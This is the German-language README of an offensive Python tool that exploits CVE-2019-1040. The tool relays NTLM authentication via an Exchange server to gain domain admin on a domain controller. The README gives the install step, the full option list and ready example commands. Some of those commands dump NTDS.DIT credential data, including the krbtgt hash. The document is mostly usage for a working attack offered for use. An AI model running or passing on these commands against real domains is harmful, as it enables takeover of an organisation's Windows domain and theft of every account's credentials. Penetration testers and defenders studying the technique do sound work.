
CVE-2019-1040 mit Exchange
Toller Artikel! Ausnutzung von CVE-2019-1040 - Kombination von Relay-Schwachstellen für RCE und Domain Admin .
Also habe ich CVE-2019-1040.py zur einfachen Nutzung geschrieben.
Du kannst dir auch mein exchange2domain-Repo ansehen: https://github.com/ridter/exchange2domain, eine weitere Möglichkeit, Exchange zu nutzen, um den DC zu erlangen.
Diese Tools benötigen impacket. Du kannst es mit pip install impacket aus pip installieren.
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
[--hashes HASHES] [--smb-port [destination port]] -ah
ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
[-t TIMEOUT]
[--exec-method [{smbexec,wmiexec,mmcexec}]]
[--just-dc-user USERNAME] [--debug]
EX_HOSTNAME
CVE-2019-1040 with Exchange
positional arguments:
EX_HOSTNAME Hostname/ip of the Exchange server
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
username for authentication
-d DOMAIN, --domain DOMAIN
domain the user is in (FQDN or NETBIOS domain name)
-p PASSWORD, --password PASSWORD
Password for authentication, will prompt if not
specified and no NT:NTLM hashes are supplied
--hashes HASHES LM:NLTM hashes
--smb-port [destination port]
Destination port to connect to SMB Server
-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
Attacker hostname or IP
-th TARGET_HOST, --target-host TARGET_HOST
Hostname or IP of the DC
-t TIMEOUT, --timeout TIMEOUT
timeout in seconds
--exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using
-use-vss). Default: smbexec
--just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified.
Only available for DRSUAPI approach.
--debug Enable debug output
Beispiel:
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip
Wenn du nur krbtgt dumpen möchtest, verwende --just-dc-user.
Beispiel:
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt
